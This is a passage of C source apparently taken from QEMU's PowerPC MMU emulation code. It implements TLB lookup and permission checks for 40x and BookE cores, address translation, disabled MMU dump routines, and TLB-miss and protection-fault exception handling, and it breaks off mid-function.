ACCESS_INT: /* Integer load/store : only access allowed */ break; case ACCESS_CODE: /* No code fetch is allowed in direct-store areas */ return -4; case ACCESS_FLOAT: /* Floating point load/store */ return -4; case ACCESS_RES: /* lwarx, ldarx or srwcx. */ return -4; case ACCESS_CACHE: /* * dcba, dcbt, dcbtst, dcbf, dcbi, dcbst, dcbz, or icbi * * Should make the instruction do no-op. As it already do * no-op, it's quite easy :-) */ ctx->raddr = eaddr; return 0; case ACCESS_EXT: /* eciwx or ecowx */ return -4; default: #if 0 qemu_log_mask(CPU_LOG_MMU, "ERROR: instruction should not need " "address translation\n"); #endif return -4; } if ((rw == 1 || ctx->key != 1) && (rw == 0 || ctx->key != 0)) { ctx->raddr = eaddr; ret = 2; } else { ret = -2; } } return ret; } /* Generic TLB check function for embedded PowerPC implementations */ static int ppcemb_tlb_check(CPUPPCState *env, ppcemb_tlb_t *tlb, hwaddr *raddrp, target_ulong address, uint32_t pid, int ext, int i) { target_ulong mask; /* Check valid flag */ if (!(tlb->prot & PAGE_VALID)) { return -1; } mask = ~(tlb->size - 1); LOG_SWTLB("%s: TLB %d address " TARGET_FMT_lx " PID %u <=> " TARGET_FMT_lx " " TARGET_FMT_lx " %u %x\n", __func__, i, address, pid, tlb->EPN, mask, (uint32_t)tlb->PID, tlb->prot); /* Check PID */ if (tlb->PID != 0 && tlb->PID != pid) { return -1; } /* Check effective address */ if ((address & mask) != tlb->EPN) { return -1; } *raddrp = (tlb->RPN & mask) | (address & ~mask); if (ext) { /* Extend the physical address to 36 bits */ *raddrp |= (uint64_t)(tlb->RPN & 0xF) << 32; } return 0; } /* Generic TLB search function for PowerPC embedded implementations */ static int ppcemb_tlb_search(CPUPPCState *env, target_ulong address, uint32_t pid) { ppcemb_tlb_t *tlb; hwaddr raddr; int i, ret; /* Default return value is no match */ ret = -1; for (i = 0; i < env->nb_tlb; i++) { tlb = &env->tlb.tlbe[i]; if (ppcemb_tlb_check(env, tlb, &raddr, address, pid, 0, i) == 0) { ret = i; break; } } return ret; } /* Helpers specific to PowerPC 40x implementations */ static inline void ppc4xx_tlb_invalidate_all(CPUPPCState *env) { ppcemb_tlb_t *tlb; int i; for (i = 0; i < env->nb_tlb; i++) { tlb = &env->tlb.tlbe[i]; tlb->prot &= ~PAGE_VALID; } tlb_flush(env_cpu(env)); } static int mmu40x_get_physical_address(CPUPPCState *env, mmu_ctx_t *ctx, target_ulong address, int rw, int access_type) { ppcemb_tlb_t *tlb; hwaddr raddr; int i, ret, zsel, zpr, pr; ret = -1; #ifdef _MSC_VER raddr = (hwaddr)(0ULL - 1ULL); #else raddr = (hwaddr)-1ULL; #endif pr = msr_pr; for (i = 0; i < env->nb_tlb; i++) { tlb = &env->tlb.tlbe[i]; if (ppcemb_tlb_check(env, tlb, &raddr, address, env->spr[SPR_40x_PID], 0, i) < 0) { continue; } zsel = (tlb->attr >> 4) & 0xF; zpr = (env->spr[SPR_40x_ZPR] >> (30 - (2 * zsel))) & 0x3; LOG_SWTLB("%s: TLB %d zsel %d zpr %d rw %d attr %08x\n", __func__, i, zsel, zpr, rw, tlb->attr); /* Check execute enable bit */ switch (zpr) { case 0x2: if (pr != 0) { goto check_perms; } /* fall through */ case 0x3: /* All accesses granted */ ctx->prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; ret = 0; break; case 0x0: if (pr != 0) { /* Raise Zone protection fault. */ env->spr[SPR_40x_ESR] = 1 << 22; ctx->prot = 0; ret = -2; break; } /* fall through */ case 0x1: check_perms: /* Check from TLB entry */ ctx->prot = tlb->prot; ret = check_prot(ctx->prot, rw, access_type); if (ret == -2) { env->spr[SPR_40x_ESR] = 0; } break; } if (ret >= 0) { ctx->raddr = raddr; LOG_SWTLB("%s: access granted " TARGET_FMT_lx " => " TARGET_FMT_plx " %d %d\n", __func__, address, ctx->raddr, ctx->prot, ret); return 0; } } LOG_SWTLB("%s: access refused " TARGET_FMT_lx " => " TARGET_FMT_plx " %d %d\n", __func__, address, raddr, ctx->prot, ret); return ret; } void store_40x_sler(CPUPPCState *env, uint32_t val) { /* XXX: TO BE FIXED */ if (val != 0x00000000) { cpu_abort(env_cpu(env), "Little-endian regions are not supported by now\n"); } env->spr[SPR_405_SLER] = val; } static inline int mmubooke_check_tlb(CPUPPCState *env, ppcemb_tlb_t *tlb, hwaddr *raddr, int *prot, target_ulong address, int rw, int access_type, int i) { int ret, prot2; if (ppcemb_tlb_check(env, tlb, raddr, address, env->spr[SPR_BOOKE_PID], !env->nb_pids, i) >= 0) { goto found_tlb; } if (env->spr[SPR_BOOKE_PID1] && ppcemb_tlb_check(env, tlb, raddr, address, env->spr[SPR_BOOKE_PID1], 0, i) >= 0) { goto found_tlb; } if (env->spr[SPR_BOOKE_PID2] && ppcemb_tlb_check(env, tlb, raddr, address, env->spr[SPR_BOOKE_PID2], 0, i) >= 0) { goto found_tlb; } LOG_SWTLB("%s: TLB entry not found\n", __func__); return -1; found_tlb: if (msr_pr != 0) { prot2 = tlb->prot & 0xF; } else { prot2 = (tlb->prot >> 4) & 0xF; } /* Check the address space */ if (access_type == ACCESS_CODE) { if (msr_ir != (tlb->attr & 1)) { LOG_SWTLB("%s: AS doesn't match\n", __func__); return -1; } *prot = prot2; if (prot2 & PAGE_EXEC) { LOG_SWTLB("%s: good TLB!\n", __func__); return 0; } LOG_SWTLB("%s: no PAGE_EXEC: %x\n", __func__, prot2); ret = -3; } else { if (msr_dr != (tlb->attr & 1)) { LOG_SWTLB("%s: AS doesn't match\n", __func__); return -1; } *prot = prot2; if ((!rw && prot2 & PAGE_READ) || (rw && (prot2 & PAGE_WRITE))) { LOG_SWTLB("%s: found TLB!\n", __func__); return 0; } LOG_SWTLB("%s: PAGE_READ/WRITE doesn't match: %x\n", __func__, prot2); ret = -2; } return ret; } static int mmubooke_get_physical_address(CPUPPCState *env, mmu_ctx_t *ctx, target_ulong address, int rw, int access_type) { ppcemb_tlb_t *tlb; hwaddr raddr; int i, ret; ret = -1; #ifdef _MSC_VER raddr = (hwaddr)(0ULL - 1ULL); #else raddr = (hwaddr)-1ULL; #endif for (i = 0; i < env->nb_tlb; i++) { tlb = &env->tlb.tlbe[i]; ret = mmubooke_check_tlb(env, tlb, &raddr, &ctx->prot, address, rw, access_type, i); if (ret != -1) { break; } } if (ret >= 0) { ctx->raddr = raddr; LOG_SWTLB("%s: access granted " TARGET_FMT_lx " => " TARGET_FMT_plx " %d %d\n", __func__, address, ctx->raddr, ctx->prot, ret); } else { LOG_SWTLB("%s: access refused " TARGET_FMT_lx " => " TARGET_FMT_plx " %d %d\n", __func__, address, raddr, ctx->prot, ret); } return ret; } static void booke206_flush_tlb(CPUPPCState *env, int flags, const int check_iprot) { int tlb_size; int i, j; ppcmas_tlb_t *tlb = env->tlb.tlbm; for (i = 0; i < BOOKE206_MAX_TLBN; i++) { if (flags & (1 << i)) { tlb_size = booke206_tlb_size(env, i); for (j = 0; j < tlb_size; j++) { if (!check_iprot || !(tlb[j].mas1 & MAS1_IPROT)) { tlb[j].mas1 &= ~MAS1_VALID; } } } tlb += booke206_tlb_size(env, i); } tlb_flush(env_cpu(env)); } static hwaddr booke206_tlb_to_page_size(CPUPPCState *env, ppcmas_tlb_t *tlb) { int tlbm_size; tlbm_size = (tlb->mas1 & MAS1_TSIZE_MASK) >> MAS1_TSIZE_SHIFT; return 1024ULL << tlbm_size; } /* TLB check function for MAS based SoftTLBs */ static int ppcmas_tlb_check(CPUPPCState *env, ppcmas_tlb_t *tlb, hwaddr *raddrp, target_ulong address, uint32_t pid) { hwaddr mask; uint32_t tlb_pid; if (!msr_cm) { /* In 32bit mode we can only address 32bit EAs */ address = (uint32_t)address; } /* Check valid flag */ if (!(tlb->mas1 & MAS1_VALID)) { return -1; } mask = ~(booke206_tlb_to_page_size(env, tlb) - 1); LOG_SWTLB("%s: TLB ADDR=0x" TARGET_FMT_lx " PID=0x%x MAS1=0x%x MAS2=0x%" PRIx64 " mask=0x%" HWADDR_PRIx " MAS7_3=0x%" PRIx64 " MAS8=0x%" PRIx32 "\n", __func__, address, pid, tlb->mas1, tlb->mas2, mask, tlb->mas7_3, tlb->mas8); /* Check PID */ tlb_pid = (tlb->mas1 & MAS1_TID_MASK) >> MAS1_TID_SHIFT; if (tlb_pid != 0 && tlb_pid != pid) { return -1; } /* Check effective address */ if ((address & mask) != (tlb->mas2 & MAS2_EPN_MASK)) { return -1; } if (raddrp) { *raddrp = (tlb->mas7_3 & mask) | (address & ~mask); } return 0; } static bool is_epid_mmu(int mmu_idx) { return mmu_idx == PPC_TLB_EPID_STORE || mmu_idx == PPC_TLB_EPID_LOAD; } static uint32_t mmubooke206_esr(int mmu_idx, bool rw) { uint32_t esr = 0; if (rw) { esr |= ESR_ST; } if (is_epid_mmu(mmu_idx)) { esr |= ESR_EPID; } return esr; } /* * Get EPID register given the mmu_idx. If this is regular load, * construct the EPID access bits from current processor state * * Get the effective AS and PR bits and the PID. The PID is returned * only if EPID load is requested, otherwise the caller must detect * the correct EPID. Return true if valid EPID is returned. */ static bool mmubooke206_get_as(CPUPPCState *env, int mmu_idx, uint32_t *epid_out, bool *as_out, bool *pr_out) { if (is_epid_mmu(mmu_idx)) { uint32_t epidr; if (mmu_idx == PPC_TLB_EPID_STORE) { epidr = env->spr[SPR_BOOKE_EPSC]; } else { epidr = env->spr[SPR_BOOKE_EPLC]; } *epid_out = (epidr & EPID_EPID) >> EPID_EPID_SHIFT; *as_out = !!(epidr & EPID_EAS); *pr_out = !!(epidr & EPID_EPR); return true; } else { *as_out = msr_ds; *pr_out = msr_pr; return false; } } /* Check if the tlb found by hashing really matches */ static int mmubooke206_check_tlb(CPUPPCState *env, ppcmas_tlb_t *tlb, hwaddr *raddr, int *prot, target_ulong address, int rw, int access_type, int mmu_idx) { int ret; int prot2 = 0; uint32_t epid; bool as, pr; bool use_epid = mmubooke206_get_as(env, mmu_idx, &epid, &as, &pr); if (!use_epid) { if (ppcmas_tlb_check(env, tlb, raddr, address, env->spr[SPR_BOOKE_PID]) >= 0) { goto found_tlb; } if (env->spr[SPR_BOOKE_PID1] && ppcmas_tlb_check(env, tlb, raddr, address, env->spr[SPR_BOOKE_PID1]) >= 0) { goto found_tlb; } if (env->spr[SPR_BOOKE_PID2] && ppcmas_tlb_check(env, tlb, raddr, address, env->spr[SPR_BOOKE_PID2]) >= 0) { goto found_tlb; } } else { if (ppcmas_tlb_check(env, tlb, raddr, address, epid) >= 0) { goto found_tlb; } } LOG_SWTLB("%s: TLB entry not found\n", __func__); return -1; found_tlb: if (pr) { if (tlb->mas7_3 & MAS3_UR) { prot2 |= PAGE_READ; } if (tlb->mas7_3 & MAS3_UW) { prot2 |= PAGE_WRITE; } if (tlb->mas7_3 & MAS3_UX) { prot2 |= PAGE_EXEC; } } else { if (tlb->mas7_3 & MAS3_SR) { prot2 |= PAGE_READ; } if (tlb->mas7_3 & MAS3_SW) { prot2 |= PAGE_WRITE; } if (tlb->mas7_3 & MAS3_SX) { prot2 |= PAGE_EXEC; } } /* Check the address space and permissions */ if (access_type == ACCESS_CODE) { /* There is no way to fetch code using epid load */ assert(!use_epid); if (msr_ir != ((tlb->mas1 & MAS1_TS) >> MAS1_TS_SHIFT)) { LOG_SWTLB("%s: AS doesn't match\n", __func__); return -1; } *prot = prot2; if (prot2 & PAGE_EXEC) { LOG_SWTLB("%s: good TLB!\n", __func__); return 0; } LOG_SWTLB("%s: no PAGE_EXEC: %x\n", __func__, prot2); ret = -3; } else { if (as != ((tlb->mas1 & MAS1_TS) >> MAS1_TS_SHIFT)) { LOG_SWTLB("%s: AS doesn't match\n", __func__); return -1; } *prot = prot2; if ((!rw && prot2 & PAGE_READ) || (rw && (prot2 & PAGE_WRITE))) { LOG_SWTLB("%s: found TLB!\n", __func__); return 0; } LOG_SWTLB("%s: PAGE_READ/WRITE doesn't match: %x\n", __func__, prot2); ret = -2; } return ret; } static int mmubooke206_get_physical_address(CPUPPCState *env, mmu_ctx_t *ctx, target_ulong address, int rw, int access_type, int mmu_idx) { ppcmas_tlb_t *tlb; hwaddr raddr; int i, j, ret; ret = -1; #ifdef _MSC_VER raddr = (hwaddr)(0ULL - 1ULL); #else raddr = (hwaddr)-1ULL; #endif for (i = 0; i < BOOKE206_MAX_TLBN; i++) { int ways = booke206_tlb_ways(env, i); for (j = 0; j < ways; j++) { tlb = booke206_get_tlbm(env, i, address, j); if (!tlb) { continue; } ret = mmubooke206_check_tlb(env, tlb, &raddr, &ctx->prot, address, rw, access_type, mmu_idx); if (ret != -1) { goto found_tlb; } } } found_tlb: if (ret >= 0) { ctx->raddr = raddr; #if 0 LOG_SWTLB("%s: access granted " TARGET_FMT_lx " => " TARGET_FMT_plx " %d %d\n", __func__, address, ctx->raddr, ctx->prot, ret); #endif } else { #if 0 LOG_SWTLB("%s: access refused " TARGET_FMT_lx " => " TARGET_FMT_plx " %d %d\n", __func__, address, raddr, ctx->prot, ret); #endif } return ret; } #if 0 static const char *book3e_tsize_to_str[32] = { "1K", "2K", "4K", "8K", "16K", "32K", "64K", "128K", "256K", "512K", "1M", "2M", "4M", "8M", "16M", "32M", "64M", "128M", "256M", "512M", "1G", "2G", "4G", "8G", "16G", "32G", "64G", "128G", "256G", "512G", "1T", "2T" }; static void mmubooke_dump_mmu(CPUPPCState *env) { ppcemb_tlb_t *entry; int i; if (kvm_enabled() && !env->kvm_sw_tlb) { qemu_printf("Cannot access KVM TLB\n"); return; } qemu_printf("\nTLB:\n"); qemu_printf("Effective Physical Size PID Prot " "Attr\n"); entry = &env->tlb.tlbe[0]; for (i = 0; i < env->nb_tlb; i++, entry++) { hwaddr ea, pa; target_ulong mask; uint64_t size = (uint64_t)entry->size; char size_buf[20]; /* Check valid flag */ if (!(entry->prot & PAGE_VALID)) { continue; } mask = ~(entry->size - 1); ea = entry->EPN & mask; pa = entry->RPN & mask; /* Extend the physical address to 36 bits */ pa |= (hwaddr)(entry->RPN & 0xF) << 32; if (size >= 1 * MiB) { snprintf(size_buf, sizeof(size_buf), "%3" PRId64 "M", size / MiB); } else { snprintf(size_buf, sizeof(size_buf), "%3" PRId64 "k", size / KiB); } qemu_printf("0x%016" PRIx64 " 0x%016" PRIx64 " %s %-5u %08x %08x\n", (uint64_t)ea, (uint64_t)pa, size_buf, (uint32_t)entry->PID, entry->prot, entry->attr); } } static void mmubooke206_dump_one_tlb(CPUPPCState *env, int tlbn, int offset, int tlbsize) { ppcmas_tlb_t *entry; int i; qemu_printf("\nTLB%d:\n", tlbn); qemu_printf("Effective Physical Size TID TS SRWX" " URWX WIMGE U0123\n"); entry = &env->tlb.tlbm[offset]; for (i = 0; i < tlbsize; i++, entry++) { hwaddr ea, pa, size; int tsize; if (!(entry->mas1 & MAS1_VALID)) { continue; } tsize = (entry->mas1 & MAS1_TSIZE_MASK) >> MAS1_TSIZE_SHIFT; size = 1024ULL << tsize; ea = entry->mas2 & ~(size - 1); pa = entry->mas7_3 & ~(size - 1); qemu_printf("0x%016" PRIx64 " 0x%016" PRIx64 " %4s %-5u %1u S%c%c%c" "U%c%c%c %c%c%c%c%c U%c%c%c%c\n", (uint64_t)ea, (uint64_t)pa, book3e_tsize_to_str[tsize], (entry->mas1 & MAS1_TID_MASK) >> MAS1_TID_SHIFT, (entry->mas1 & MAS1_TS) >> MAS1_TS_SHIFT, entry->mas7_3 & MAS3_SR ? 'R' : '-', entry->mas7_3 & MAS3_SW ? 'W' : '-', entry->mas7_3 & MAS3_SX ? 'X' : '-', entry->mas7_3 & MAS3_UR ? 'R' : '-', entry->mas7_3 & MAS3_UW ? 'W' : '-', entry->mas7_3 & MAS3_UX ? 'X' : '-', entry->mas2 & MAS2_W ? 'W' : '-', entry->mas2 & MAS2_I ? 'I' : '-', entry->mas2 & MAS2_M ? 'M' : '-', entry->mas2 & MAS2_G ? 'G' : '-', entry->mas2 & MAS2_E ? 'E' : '-', entry->mas7_3 & MAS3_U0 ? '0' : '-', entry->mas7_3 & MAS3_U1 ? '1' : '-', entry->mas7_3 & MAS3_U2 ? '2' : '-', entry->mas7_3 & MAS3_U3 ? '3' : '-'); } } static void mmubooke206_dump_mmu(CPUPPCState *env) { int offset = 0; int i; #if 0 if (kvm_enabled() && !env->kvm_sw_tlb) { qemu_printf("Cannot access KVM TLB\n"); return; } #endif for (i = 0; i < BOOKE206_MAX_TLBN; i++) { int size = booke206_tlb_size(env, i); if (size == 0) { continue; } mmubooke206_dump_one_tlb(env, i, offset, size); offset += size; } } static void mmu6xx_dump_BATs(CPUPPCState *env, int type) { target_ulong *BATlt, *BATut, *BATu, *BATl; target_ulong BEPIl, BEPIu, bl; int i; switch (type) { case ACCESS_CODE: BATlt = env->IBAT[1]; BATut = env->IBAT[0]; break; default: BATlt = env->DBAT[1]; BATut = env->DBAT[0]; break; } for (i = 0; i < env->nb_BATs; i++) { BATu = &BATut[i]; BATl = &BATlt[i]; BEPIu = *BATu & 0xF0000000; BEPIl = *BATu & 0x0FFE0000; bl = (*BATu & 0x00001FFC) << 15; qemu_printf("%s BAT%d BATu " TARGET_FMT_lx " BATl " TARGET_FMT_lx "\n\t" TARGET_FMT_lx " " TARGET_FMT_lx " " TARGET_FMT_lx "\n", type == ACCESS_CODE ? "code" : "data", i, *BATu, *BATl, BEPIu, BEPIl, bl); } } static void mmu6xx_dump_mmu(CPUPPCState *env) { PowerPCCPU *cpu = env_archcpu(env); ppc6xx_tlb_t *tlb; target_ulong sr; int type, way, entry, i; qemu_printf("HTAB base = 0x%"HWADDR_PRIx"\n", ppc_hash32_hpt_base(cpu)); qemu_printf("HTAB mask = 0x%"HWADDR_PRIx"\n", ppc_hash32_hpt_mask(cpu)); qemu_printf("\nSegment registers:\n"); for (i = 0; i < 32; i++) { sr = env->sr[i]; if (sr & 0x80000000) { qemu_printf("%02d T=%d Ks=%d Kp=%d BUID=0x%03x " "CNTLR_SPEC=0x%05x\n", i, sr & 0x80000000 ? 1 : 0, sr & 0x40000000 ? 1 : 0, sr & 0x20000000 ? 1 : 0, (uint32_t)((sr >> 20) & 0x1FF), (uint32_t)(sr & 0xFFFFF)); } else { qemu_printf("%02d T=%d Ks=%d Kp=%d N=%d VSID=0x%06x\n", i, sr & 0x80000000 ? 1 : 0, sr & 0x40000000 ? 1 : 0, sr & 0x20000000 ? 1 : 0, sr & 0x10000000 ? 1 : 0, (uint32_t)(sr & 0x00FFFFFF)); } } qemu_printf("\nBATs:\n"); mmu6xx_dump_BATs(env, ACCESS_INT); mmu6xx_dump_BATs(env, ACCESS_CODE); if (env->id_tlbs != 1) { qemu_printf("ERROR: 6xx MMU should have separated TLB" " for code and data\n"); } qemu_printf("\nTLBs [EPN EPN + SIZE]\n"); for (type = 0; type < 2; type++) { for (way = 0; way < env->nb_ways; way++) { for (entry = env->nb_tlb * type + env->tlb_per_way * way; entry < (env->nb_tlb * type + env->tlb_per_way * (way + 1)); entry++) { tlb = &env->tlb.tlb6[entry]; qemu_printf("%s TLB %02d/%02d way:%d %s [" TARGET_FMT_lx " " TARGET_FMT_lx "]\n", type ? "code" : "data", entry % env->nb_tlb, env->nb_tlb, way, pte_is_valid(tlb->pte0) ? "valid" : "inval", tlb->EPN, tlb->EPN + TARGET_PAGE_SIZE); } } } } #endif void dump_mmu(CPUPPCState *env) { #if 0 switch (env->mmu_model) { case POWERPC_MMU_BOOKE: mmubooke_dump_mmu(env); break; case POWERPC_MMU_BOOKE206: mmubooke206_dump_mmu(env); break; case POWERPC_MMU_SOFT_6xx: case POWERPC_MMU_SOFT_74xx: mmu6xx_dump_mmu(env); break; #if defined(TARGET_PPC64) case POWERPC_MMU_64B: case POWERPC_MMU_2_03: case POWERPC_MMU_2_06: case POWERPC_MMU_2_07: dump_slb(env_archcpu(env)); break; case POWERPC_MMU_3_00: if (ppc64_v3_radix(env_archcpu(env))) { /* TODO - Unsupported */ } else { dump_slb(env_archcpu(env)); break; } #endif default: qemu_log_mask(LOG_UNIMP, "%s: unimplemented\n", __func__); } #endif } static inline int check_physical(CPUPPCState *env, mmu_ctx_t *ctx, target_ulong eaddr, int rw) { int in_plb, ret; ctx->raddr = eaddr; ctx->prot = PAGE_READ | PAGE_EXEC; ret = 0; switch (env->mmu_model) { case POWERPC_MMU_SOFT_6xx: case POWERPC_MMU_SOFT_74xx: case POWERPC_MMU_SOFT_4xx: case POWERPC_MMU_REAL: case POWERPC_MMU_BOOKE: ctx->prot |= PAGE_WRITE; break; case POWERPC_MMU_SOFT_4xx_Z: if (unlikely(msr_pe != 0)) { /* * 403 family add some particular protections, using * PBL/PBU registers for accesses with no translation. */ in_plb = /* Check PLB validity */ (env->pb[0] < env->pb[1] && /* and address in plb area */ eaddr >= env->pb[0] && eaddr < env->pb[1]) || (env->pb[2] < env->pb[3] && eaddr >= env->pb[2] && eaddr < env->pb[3]) ? 1 : 0; if (in_plb ^ msr_px) { /* Access in protected area */ if (rw == 1) { /* Access is not allowed */ ret = -2; } } else { /* Read-write access is allowed */ ctx->prot |= PAGE_WRITE; } } break; default: /* Caller's checks mean we should never get here for other models */ abort(); return -1; } return ret; } static int get_physical_address_wtlb( CPUPPCState *env, mmu_ctx_t *ctx, target_ulong eaddr, int rw, int access_type, int mmu_idx) { int ret = -1; bool real_mode = (access_type == ACCESS_CODE && msr_ir == 0) || (access_type != ACCESS_CODE && msr_dr == 0); switch (env->mmu_model) { case POWERPC_MMU_SOFT_6xx: case POWERPC_MMU_SOFT_74xx: if (real_mode) { ret = check_physical(env, ctx, eaddr, rw); } else { /* Try to find a BAT */ if (env->nb_BATs != 0) { ret = get_bat_6xx_tlb(env, ctx, eaddr, rw, access_type); } if (ret < 0) { /* We didn't match any BAT entry or don't have BATs */ ret = get_segment_6xx_tlb(env, ctx, eaddr, rw, access_type); } } break; case POWERPC_MMU_SOFT_4xx: case POWERPC_MMU_SOFT_4xx_Z: if (real_mode) { ret = check_physical(env, ctx, eaddr, rw); } else { ret = mmu40x_get_physical_address(env, ctx, eaddr, rw, access_type); } break; case POWERPC_MMU_BOOKE: ret = mmubooke_get_physical_address(env, ctx, eaddr, rw, access_type); break; case POWERPC_MMU_BOOKE206: ret = mmubooke206_get_physical_address(env, ctx, eaddr, rw, access_type, mmu_idx); break; case POWERPC_MMU_MPC8xx: /* XXX: TODO */ cpu_abort(env_cpu(env), "MPC8xx MMU model is not implemented\n"); break; case POWERPC_MMU_REAL: if (real_mode) { ret = check_physical(env, ctx, eaddr, rw); } else { cpu_abort(env_cpu(env), "PowerPC in real mode do not do any translation\n"); return -1; } break; default: cpu_abort(env_cpu(env), "Unknown or invalid MMU model\n"); return -1; } return ret; } static int get_physical_address( CPUPPCState *env, mmu_ctx_t *ctx, target_ulong eaddr, int rw, int access_type) { return get_physical_address_wtlb(env, ctx, eaddr, rw, access_type, 0); } hwaddr ppc_cpu_get_phys_page_debug(CPUState *cs, vaddr addr) { PowerPCCPU *cpu = POWERPC_CPU(cs); CPUPPCState *env = &cpu->env; mmu_ctx_t ctx; switch (env->mmu_model) { #if defined(TARGET_PPC64) case POWERPC_MMU_64B: case POWERPC_MMU_2_03: case POWERPC_MMU_2_06: case POWERPC_MMU_2_07: return ppc_hash64_get_phys_page_debug(cpu, addr); case POWERPC_MMU_3_00: return ppc64_v3_get_phys_page_debug(cpu, addr); #endif case POWERPC_MMU_32B: case POWERPC_MMU_601: return ppc_hash32_get_phys_page_debug(cpu, addr); default: ; } if (unlikely(get_physical_address(env, &ctx, addr, 0, ACCESS_INT) != 0)) { /* * Some MMUs have separate TLBs for code and data. If we only * try an ACCESS_INT, we may not be able to read instructions * mapped by code TLBs, so we also try a ACCESS_CODE. */ if (unlikely(get_physical_address(env, &ctx, addr, 0, ACCESS_CODE) != 0)) { return -1; } } return ctx.raddr & TARGET_PAGE_MASK; } static void booke206_update_mas_tlb_miss(CPUPPCState *env, target_ulong address, int rw, int mmu_idx) { uint32_t epid; bool as, pr; uint32_t missed_tid = 0; bool use_epid = mmubooke206_get_as(env, mmu_idx, &epid, &as, &pr); if (rw == 2) { as = msr_ir; } env->spr[SPR_BOOKE_MAS0] = env->spr[SPR_BOOKE_MAS4] & MAS4_TLBSELD_MASK; env->spr[SPR_BOOKE_MAS1] = env->spr[SPR_BOOKE_MAS4] & MAS4_TSIZED_MASK; env->spr[SPR_BOOKE_MAS2] = env->spr[SPR_BOOKE_MAS4] & MAS4_WIMGED_MASK; env->spr[SPR_BOOKE_MAS3] = 0; env->spr[SPR_BOOKE_MAS6] = 0; env->spr[SPR_BOOKE_MAS7] = 0; /* AS */ if (as) { env->spr[SPR_BOOKE_MAS1] |= MAS1_TS; env->spr[SPR_BOOKE_MAS6] |= MAS6_SAS; } env->spr[SPR_BOOKE_MAS1] |= MAS1_VALID; env->spr[SPR_BOOKE_MAS2] |= address & MAS2_EPN_MASK; if (!use_epid) { switch (env->spr[SPR_BOOKE_MAS4] & MAS4_TIDSELD_PIDZ) { case MAS4_TIDSELD_PID0: missed_tid = env->spr[SPR_BOOKE_PID]; break; case MAS4_TIDSELD_PID1: missed_tid = env->spr[SPR_BOOKE_PID1]; break; case MAS4_TIDSELD_PID2: missed_tid = env->spr[SPR_BOOKE_PID2]; break; } env->spr[SPR_BOOKE_MAS6] |= env->spr[SPR_BOOKE_PID] << 16; } else { missed_tid = epid; env->spr[SPR_BOOKE_MAS6] |= missed_tid << 16; } env->spr[SPR_BOOKE_MAS1] |= (missed_tid << MAS1_TID_SHIFT); /* next victim logic */ env->spr[SPR_BOOKE_MAS0] |= env->last_way << MAS0_ESEL_SHIFT; env->last_way++; env->last_way &= booke206_tlb_ways(env, 0) - 1; env->spr[SPR_BOOKE_MAS0] |= env->last_way << MAS0_NV_SHIFT; } /* Perform address translation */ static int cpu_ppc_handle_mmu_fault(CPUPPCState *env, target_ulong address, int rw, int mmu_idx) { CPUState *cs = env_cpu(env); PowerPCCPU *cpu = POWERPC_CPU(cs); mmu_ctx_t ctx; int access_type; int ret = 0; if (rw == 2) { /* code access */ rw = 0; access_type = ACCESS_CODE; } else { /* data access */ access_type = env->access_type; } ret = get_physical_address_wtlb(env, &ctx, address, rw, access_type, mmu_idx); if (ret == 0) { tlb_set_page(cs, address & TARGET_PAGE_MASK, ctx.raddr & TARGET_PAGE_MASK, ctx.prot, mmu_idx, TARGET_PAGE_SIZE); ret = 0; } else if (ret < 0) { LOG_MMU_STATE(cs); if (access_type == ACCESS_CODE) { switch (ret) { case -1: /* No matches in page tables or TLB */ switch (env->mmu_model) { case POWERPC_MMU_SOFT_6xx: cs->exception_index = POWERPC_EXCP_IFTLB; env->error_code = 1 << 18; env->spr[SPR_IMISS] = address; env->spr[SPR_ICMP] = 0x80000000 | ctx.ptem; goto tlb_miss; case POWERPC_MMU_SOFT_74xx: cs->exception_index = POWERPC_EXCP_IFTLB; goto tlb_miss_74xx; case POWERPC_MMU_SOFT_4xx: case POWERPC_MMU_SOFT_4xx_Z: cs->exception_index = POWERPC_EXCP_ITLB; env->error_code = 0; env->spr[SPR_40x_DEAR] = address; env->spr[SPR_40x_ESR] = 0x00000000; break; case POWERPC_MMU_BOOKE206: booke206_update_mas_tlb_miss(env, address, 2, mmu_idx); /* fall through */ case POWERPC_MMU_BOOKE: cs->exception_index = POWERPC_EXCP_ITLB; env->error_code = 0; env->spr[SPR_BOOKE_DEAR] = address; env->spr[SPR_BOOKE_ESR] = mmubooke206_esr(mmu_idx, 0); return -1; case POWERPC_MMU_MPC8xx: /* XXX: TODO */ cpu_abort(cs, "MPC8xx MMU model is not implemented\n"); break; case POWERPC_MMU_REAL: cpu_abort(cs, "PowerPC in real mode should never raise " "any MMU exceptions\n"); return -1; default: cpu_abort(cs, "Unknown or invalid MMU model\n"); return -1; } break; case -2: /* Access rights violation */ cs->exception_index = POWERPC_EXCP_ISI; env->error_code = 0x08000000; break; case -3: /* No execute protection violation */ if ((env->mmu_model == POWERPC_MMU_BOOKE) || (env->mmu_model == POWERPC_MMU_BOOKE206)) { env->spr[SPR_BOOKE_ESR] = 0x00000000; } cs->exception_index = POWERPC_EXCP_ISI; env->error_code = 0x10000000; break; case -4: /* Direct store exception */ /* No code fetch is allowed in direct-store areas */ cs->exception_index = POWERPC_EXCP_ISI; env->error_code = 0x10000000; break; } } else { switch (ret) { case -1: /* No matches in page tables or TLB */ switch (env->mmu_model) { case POWERPC_MMU_SOFT_6xx: if (rw == 1) { cs->exception_index = POWERPC_EXCP_DSTLB; env->error_code = 1 << 16; } else { cs->exception_index = POWERPC_EXCP_DLTLB; env->error_code = 0; } env->spr[SPR_DMISS] = address; env->spr[SPR_DCMP] = 0x80000000 | ctx.ptem; tlb_miss: env->error_code |= ctx.key << 19; env->spr[SPR_HASH1] = ppc_hash32_hpt_base(cpu) + get_pteg_offset32(cpu, ctx.hash[0]); env->spr[SPR_HASH2] = ppc_hash32_hpt_base(cpu) + get_pteg_offset32(cpu, ctx.hash[1]); break; case POWERPC_MMU_SOFT_74xx: if (rw == 1) { cs->exception_index = POWERPC_EXCP_DSTLB; } else { cs->exception_index = POWERPC_EXCP_DLTLB; } tlb_miss_74xx: /* Implement LRU algorithm */ env->error_code = ctx.key << 19; env->spr[SPR_TLBMISS] = (address & ~((target_ulong)0x3)) | ((env->last_way + 1) & (env->nb_ways - 1)); env->spr[SPR_PTEHI] = 0x80000000 | ctx.ptem; break; case POWERPC_MMU_SOFT_4xx: case POWERPC_MMU_SOFT_4xx_Z: cs->exception_index = POWERPC_EXCP_DTLB; env->error_code = 0; env->spr[SPR_40x_DEAR] = address; if (rw) { env->spr[SPR_40x_ESR] = 0x00800000; } else { env->spr[SPR_40x_ESR] = 0x00000000; } break; case POWERPC_MMU_MPC8xx: /* XXX: TODO */ cpu_abort(cs, "MPC8xx MMU model is not 